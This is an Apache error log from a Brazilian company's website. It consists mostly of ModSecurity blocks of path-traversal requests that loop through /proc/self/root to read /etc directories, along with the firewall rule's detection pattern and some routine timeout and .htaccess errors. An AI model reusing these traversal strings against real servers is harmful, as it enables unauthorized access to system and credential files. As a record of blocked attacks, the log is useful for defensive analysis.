[Thu Mar 19 03:19:43.719261 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:34680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVfv-YZRR_7pZ7nDJPhAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:19:53.266981 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:56102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVifu8EFLIOrSqIptfgAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:20:00.141800 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40662] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:20:06.344115 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:58960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVlhkFeYa1D6dYQnCu4gAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:20:19.398906 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:58960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVoxkFeYa1D6dYQnCu6AAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:20:24.141777 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:20:31.414042 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.241.31:36458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVr_-YZRR_7pZ7nDJPnwAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:20:44.991336 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:39014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuVvAbLMZ6AikZjR9UfYwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:20:48.172016 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:21:05.876008 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.241.31:56822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuV0RkFeYa1D6dYQnCu-wAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:21:12.025803 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:21:25.360147 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.241.31:56822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuV5RkFeYa1D6dYQnCvBQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:21:35.129852 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42766] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:21:42.583088 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:42180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuV9gbLMZ6AikZjR9UfhgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:21:49.042164 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.241.31:54116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuV_RkFeYa1D6dYQnCvIQAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:21:50.105000 2026] [mime_magic:error] [pid 27293:tid 140411574073088] (70014)End of file found: [client 74.7.243.128:46674] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr
[Thu Mar 19 03:21:50.105405 2026] [access_compat:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:46674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr
[Thu Mar 19 03:21:56.494219 2026] [core:alert] [pid 15826:tid 140411641214720] [client 57.141.18.41:44964] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:21:58.817912 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:22:06.264973 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:46830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWDta6ubjKNq_cu4b_eQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:22:22.072575 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:22:30.567029 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:46830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWJta6ubjKNq_cu4b_oQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:22:32.182295 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:53958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWKNa6ubjKNq_cu4b_ogAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:22:44.111809 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:22:52.809004 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:47612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWPNa6ubjKNq_cu4b_sgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:22:59.374238 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:53130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWQ8df6f5d65gmYZQ1fgAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:23:07.129795 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44902] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:23:16.515135 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:40982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWVPu8EFLIOrSqIptf7wAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:23:18.497593 2026] [mime_magic:error] [pid 27293:tid 140411548894976] (70014)End of file found: [client 57.141.18.110:46890] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:23:23.740543 2026] [mime_magic:error] [pid 19093:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:48600] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run
[Thu Mar 19 03:23:23.740746 2026] [access_compat:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:48600] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run
[Thu Mar 19 03:23:30.145771 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:23:38.064248 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:42812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWagbLMZ6AikZjR9Uf2AAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:23:41.705316 2026] [mime_magic:error] [pid 31803:tid 140411540502272] (70014)End of file found: [client 57.141.18.49:47386] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:23:43.789422 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:51550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuWb-yqAr6etmhZHNonFgAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:23:48.814928 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.113:47520] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:23:51.121820 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45820] AH01075: Error dispatching request to : (polling)
